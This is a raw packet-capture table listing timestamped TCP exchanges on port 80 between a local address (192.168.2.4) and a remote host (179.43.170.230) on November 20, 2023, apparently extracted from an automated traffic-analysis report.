Nov 20, 2023 05:21:12.136504889 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.137646914 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.137691975 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.137726068 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.137749910 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.137979031 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.138030052 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.138055086 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.138087988 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.138103962 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.138104916 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.138134956 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.138154030 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.138389111 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.138438940 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.138453007 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.138469934 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.138488054 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.138499975 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.138514042 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.138536930 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.138899088 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.138919115 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.138952017 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.138967037 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.139321089 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.139338970 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.139369965 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.139394045 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.139663935 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.139683008 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.139714003 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.139727116 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.140103102 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.140120983 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.140150070 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.140167952 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.140506029 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.140523911 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.140557051 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.140574932 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.140949965 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.140968084 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.141000986 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.141021013 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.141381979 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.141423941 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.141433954 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.141468048 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.141789913 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.141808987 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.141843081 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.141855001 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.142173052 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.142226934 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.142229080 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.142273903 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.142602921 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.142621040 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.142657995 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.142669916 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.143022060 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.143064976 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.143074036 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.143107891 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.332215071 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.332314968 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.332336903 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.332353115 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.332356930 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.332395077 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.332397938 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.332442045 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.332530022 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.332567930 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.332573891 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.332607031 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.332613945 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.332653999 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.332675934 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.332726002 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.332947016 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.332986116 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.333002090 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.333030939 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.333380938 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.333419085 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.333436012 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.333462954 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.334194899 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.334244013 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.334248066 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.334304094 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.334734917 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.334774017 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.334788084 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.334824085 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.335088968 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.335128069 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.335138083 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.335175991 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.335454941 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.335494041 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.335505009 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.335541010 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.336365938 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.336405039 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.336415052 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.336450100 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.336744070 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.336781979 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.336795092 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.336826086 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.337152958 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.337189913 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.337201118 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.337239027 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.337579012 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.337616920 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.337627888 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.337663889 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.337995052 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.338032961 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.338047028 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.338083029 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.338413000 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.338449955 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.338474989 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.338514090 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.338810921 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.338862896 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.338862896 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.338916063 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.339251995 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.339289904 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.339299917 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.339332104 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.340066910 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.340104103 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.340126991 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.340145111 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.340472937 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.340512991 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.340528965 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.340555906 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.340940952 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.340980053 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.341022015 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.341022015 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.341430902 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.341471910 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.341484070 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.341514111 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.343099117 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.343137026 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.343147993 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.343183041 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.343549967 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.343589067 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.343605995 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.343647957 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.343910933 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.343947887 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.343960047 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.343993902 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.344362974 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.344399929 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.344430923 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.344445944 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.345222950 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.345277071 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.345297098 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.345315933 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.345587969 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.345639944 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.345653057 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.345685959 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.346101999 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.346138954 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.346162081 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.346184969 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.346463919 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.346503973 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.346523046 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.346550941 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.347367048 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.347408056 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.347431898 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.347448111 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.347759008 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.347796917 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.347821951 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.347835064 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.348251104 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.348289013 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.348315001 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.348326921 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.348614931 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.348655939 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.348674059 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.348702908 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.349473953 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.349514008 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.349580050 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.349863052 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.349900961 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.349926949 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.349956036 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.350317955 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.350358009 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.350495100 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.350725889 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.350780010 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.350789070 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.350826979 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.351546049 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.351583958 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.351608038 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.351629972 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.351954937 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.351991892 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.352005005 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.352035046 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.528398991 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.528446913 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.528610945 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.528613091 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.528652906 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.528661966 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.528701067 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.529027939 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.529112101 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.529118061 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.529150009 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.529503107 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.529544115 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.529555082 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.529584885 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.530630112 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.530668020 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.530683041 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.530709028 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.531847000 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.531884909 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.531900883 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.531924009 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.531933069 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.531969070 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.532028913 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.532075882 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.532085896 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.532124043 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.532128096 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.532162905 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.532167912 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.532201052 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.532206059 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.532239914 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.532243967 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.532279968 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.532296896 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.532341957 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.532368898 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.532407045 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.532409906 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.532450914 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.532824993 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.532861948 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.532881975 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.532906055 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.534215927 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.534255028 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.534275055 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.534300089 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.534605980 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.534643888 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.534653902 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.534688950 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.535834074 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.535871983 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.535890102 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.535917997 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.536262989 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.536308050 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.536317110 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.536355019 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.536654949 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.536710978 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.536721945 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.536756039 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.538157940 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.538218975 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.538228989 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.538260937 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.538371086 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.538410902 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.538424969 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.538460016 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.538849115 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.538887024 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.538902998 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.538935900 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.539665937 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.539705038 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.539721966 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.539748907 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.540150881 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.540205956 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.540210962 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.540256977 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.540453911 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.540501118 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.540509939 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.540551901 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.540878057 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.540918112 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.540934086 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.540963888 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.541764975 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.541802883 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.541819096 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.541850090 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.542152882 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.542206049 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.542207956 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.542254925 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.543005943 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.543044090 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.543056011 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.543087959 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.543587923 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.543627024 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.543643951 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.543673992 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.543910027 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.543950081 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.543966055 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.543993950 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.544269085 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.544306993 CET	80	49731	179.43.170.230	192.168.2.4
